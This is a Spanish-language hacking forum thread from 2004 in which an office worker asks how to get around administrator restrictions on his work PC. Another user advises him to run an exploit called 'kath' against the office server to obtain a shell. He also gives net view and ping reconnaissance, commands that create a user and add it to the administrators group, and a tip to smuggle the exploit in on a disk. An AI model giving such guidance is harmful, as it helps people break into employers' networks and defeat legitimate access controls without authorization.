Un reto interesante....... a ver quién se le mide

Iniciado por Alberto M, 8 Diciembre 2004, 06:36 AM

0 Miembros y 1 Visitante están viendo este tema.

Alberto M

Hola amigos de elhacker.net.

Resulta que yo trabajo en cierta oficina con un pc que tiene instalado un Windows Xp Professional, pero éste pc está conectado a una red y está configurado como cliente de un servidor que tiene el programa Excalibur Guardián instalado y con este programa restringen con acceso remoto muchas aplicaciones de este pc,ejemplo; cuando doy clic derecho en cualquier parte del escritorio que no tenga íconos y luego doy clic en propiedades, me aparece un mensaje que dice:" Esta aplicación ha sido cancelada debido a las restricciones específicas para este equipo, por favor póngase en contacto con el administrador" y cosas así, que resultan realmente incómodas....... Lo que yo pretendo es idear una forma de burlar estas restricciones, pero como soy muy novato en el tema de la computación necesito de su gran ayuda para poder lograrlo, a mí se me ha ocurrido restaurar el equipo a una fecha que yo sé que funcionaba sin restricciones, pero cuando intento restaurarlo me aparece de nuevo el mensaje" Esta operación ha sido cancelada......." Por favor necesito de su ayuda para ver si existe alguna forma de burlar las restricciones y poder restaurar el equipo a una fecha que no las tenía.

Gracias por la atención prestada.

Man-In-the-Middle

#1
umm curioso,  pero me parece que con un exoloit de elevacion de privilegios(en la parte de exploits y bugs, me parece que hasta hay por ahi hay unos hilos que hablasn de este exploit y es mas hay compuilado), si es que ese es le caso, pero viendo la cosa mas clara, me parece que es programa no es el que te causa el problema, sera que te han puesto como usuario y no administrador de tu pc, pero igual forma, otra cosa que podrias hacer es esto, bajate el kath, que es un exploit y hackeate el server y una ves qu tengas la shell
estos pasos

C:\1>net user

Cuentas de usuario de \\NONE

-------------------------------------------------------------------------
Administrador            Invitado                 LNSS_MONITOR_USR
VUSR_NONE
Se ha completado el comando correctamente.

si noe stas como admin, tonces
pones

c:\net user tu user tu pass /add

c:\net localgroup administradores(tator) tu user /add

net localgroup administradores(tator)

Bueno asumo que debe ser eso, hoy estoy medio colado de cabeza XDDD, pero bueno ahi te dejo el link del kath
, te explico como funciona, esto es para que te metas a tu server(si es que no esta parachado) y vueno lo demas esta de sobra  ;D

primero haces un net view

\servidor
\ACCLIMA              soporte
\ADQUISICIONES
\AFORNOXP
\
eso es para saber que mauinas estan conectadas, , de ahi le haces un ping a tu servidor

y ves que numero de ip tiene

C:\1>ping shadow

Haciendo ping a shadow [10.10.20.145] con 32 bytes de datos:

Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128

Estadísticas de ping para 10.10.20.145:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos),
Tiempos aproximados de recorrido redondo en milisegundos:
    mínimo = 0ms, máximo =  0ms, promedio =  0ms

de ahi rulas el kath asi

c:\3 10.10.20.144  10.10.20.145

y ya taaa(todo esto funciona si es que no esta parachado tu server,

saludillos y espero se resuelva tu problemilla :-*



Man-In-the-Middle

fandango

Jua, exelente explicacion Man-in-the-Midle  ;D

Salutes!!!

Alberto M

Man-In-the-Middle Gracias por tu respuesta, pero resulta que mi problema consiste principalmente en que estoy impedido para descargar programas en este pc, y lo de que estoy como usuaario eso es cierto, pero igual debe existir una forma de burlar esas restricciones sin necesidad de bajar ningún programa porque también tengo el pc restringido en ese sentido, por otra parte cuento con el dato de la ip de mi pc, pero no sé hasta qué punto me pueda servir, no sé cómo utilizarla, si me puedes ayudar te lo agradeceré infinitamente.
¿Ahora dime si no es un reto interesante?

Man-In-the-Middle

Muchas gracias amigo fandango ;), por otro lado sin meniospreciar tu reto, de verdad que no me parece interesante, es la verdad ;D

Pd: Fandango, date una vuelta por futurables para laboratorio
en virus y troyanos

Saludetes
Man-In-the-Middle

Alberto M

¡Hola muchachos! Soy yo de nuevo...... es cierto que en este foro hay retos más interesantes, pero creo que el motivo de estos es ayudar a los demás, y si recurro a ustedes es porque considero que ustedes saben más que yo y creo que me pueden brindar su ayuda, ustedes no saben la satisfacción que sería para mí el poder burlar estas molestas restricciones..... Por favor ayúdenme.

Man-In-the-Middle

Te vas a un cyber, ala casa de un amigo o donde sea y te bajas el programa en la parte de exploits(no en foro), lo grabas en un disk y te vas a tu mauina de tu chamba y rulas el programa ahi y aplicas lo de arriba  ;)

Enjoy

Man-In-the-Middle

TigreDARK

Disculpa Man-In-the-Middle pero tengo algunas dudas sobre lo que le explicaste a nuestro amigo, creo que hay algo que no se entiende bien! (almenos yo no lo entenderia!). Y quiero contrubuir con mi granito de arena  ;D
Cita de: Man-In-the-Middle en  8 Diciembre 2004, 07:06 AM

si noe stas como admin, tonces
pones

c:\net user tu user tu pass /add

c:\net localgroup administradores(tator) tu user /add

net localgroup administradores(tator)

(tator) = adminisTRATOR???

Citar

eso es para saber que mauinas estan conectadas, , de ahi le haces un ping a tu servidor

y ves que numero de ip tiene

C:\1>ping shadow

Haciendo ping a shadow [10.10.20.145] con 32 bytes de datos:

Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128

Estadísticas de ping para 10.10.20.145:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos),
Tiempos aproximados de recorrido redondo en milisegundos:
    mínimo = 0ms, máximo =  0ms, promedio =  0ms

Disculpa pero no le explicaste a que te referis con SHADOW, ya que no es un COMANDO, y no esta en ninguna parte del pequeño manual que hiciste! (que te felicito por tu tiempo y ganas de hacerlo!).

Supongo que con shadow te referias al nombre de NETBIOS de la maquina SERVER de nuestro amigo!  ???

En pocas palabras lo que encontrara nuestro amigo en Recursos de Red, ahi tendras todas las pc que ves, cada nombre que ves se le puede hacer un ping y te dara su IP como te enseño Man-In... aca arriba!

Citar

de ahi rulas el kath asi

c:\3 10.10.20.144  10.10.20.145

c:\3 ????????? el 3 por que???????? que es 3???? error de digitacion????
10.10.20.144 (este seria la IP de la maquina de nuestro amigo???)
10.10.20.145 = Ip server

Man-In-the-Middle

bueno va, todo esto es un jemplo de mi red y gracias por lo de TRATOR ;)

Shadow = mauina de  mi red
3 = Kath renombrado(tengo la mania de pner numeros amis exploits)

en cuanto al rango, si tu le haces un ping a cualquier mauina vas a ver en que rango rula tu red 192.168.20.01 , 10.10.20.01, etc

donde 10.10.20.144 es una mauina anets de tu server  10.10.20.145 es tu server, se `pone asi para poder agarrar un amuina especifica
Saluuos y gracias nuevamente

Man-In-the-Middle

fandango

Cita de: Man-In-the-Middle en 10 Diciembre 2004, 00:11 AM
Muchas gracias amigo fandango ;), por otro lado sin meniospreciar tu reto, de verdad que no me parece interesante, es la verdad ;D

Pd: Fandango, date una vuelta por futurables para laboratorio
en virus y troyanos

Saludetes
Man-In-the-Middle


Ok, ahi estare!!. ;)